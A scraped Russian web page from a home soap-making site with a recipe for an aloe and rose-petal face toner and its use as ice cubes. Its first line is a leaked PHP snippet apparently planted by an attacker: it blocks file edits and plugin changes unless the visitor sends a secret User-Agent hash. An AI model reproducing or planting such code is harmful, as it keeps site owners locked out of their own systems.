if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт, как сделать бодрящий тоник с лепестками роз | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт, как сделать бодрящий тоник с лепестками роз

Что может быть лучше домашнего освежающего тоника для лица? А кубики льда будут особенно эффективными летом. Они способны создавать намного лучший тонизирующий эффект.

Что может быть луч­ше домаш­не­го осве­жа­ю­ще­го тони­ка для лица?

Для изготовления данного тоника необходимо взять:

  • алоэ (1 сред­ний лист);
  • чай­ная роза (10 лепестков).

Приготовление

1 неболь­шой лист алоэ необ­хо­ди­мо наре­зать лом­ти­ка­ми. Далее его необ­хо­ди­мо измель­чить на блен­де­ре или при помо­щи тер­ки до обра­зо­ва­ния каши­цы и сока. Сок необ­хо­ди­мо отцедить.

Лепест­ки чай­ной розы необ­хо­ди­мо залить горя­чей водой и дать в тече­ние 1 часа насто­ять­ся. После при­го­тов­ле­ния, необ­хо­ди­мо тща­тель­но сме­шать настой с соком алоэ в про­пор­ции 5:1.

Затем полу­чен­ную смесь нуж­но отпра­вить в холо­диль­ник для охлаждения.

Использование

Уход за кожей лица дан­ным сред­ством будет эффек­тив­ным, ведь все состав­ля­ю­щие в нем нату­раль­ные. Для это­го 2 под­го­тов­лен­ных ват­ных дис­ка, смо­чен­ных в воде, необ­хо­ди­мо опу­стить в при­го­тов­лен­ную мас­су. Ними необ­хо­ди­мо про­те­реть лицо и поло­жить их на гла­за на 10 минут. Так­же мож­но полу­чен­ную смесь раз­лить в фор­моч­ки для льда и замо­ро­зить их. Эти­ми куби­ка­ми мож­но про­ти­рать лицо. Поль­зо­вать­ся дан­ным сред­ством мож­но ежедневно.

Как использовать

Куби­ки льда будут осо­бен­но эффек­тив­ны­ми летом. Они спо­соб­ны созда­вать намно­го луч­ший тони­зи­ру­ю­щий эффект.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!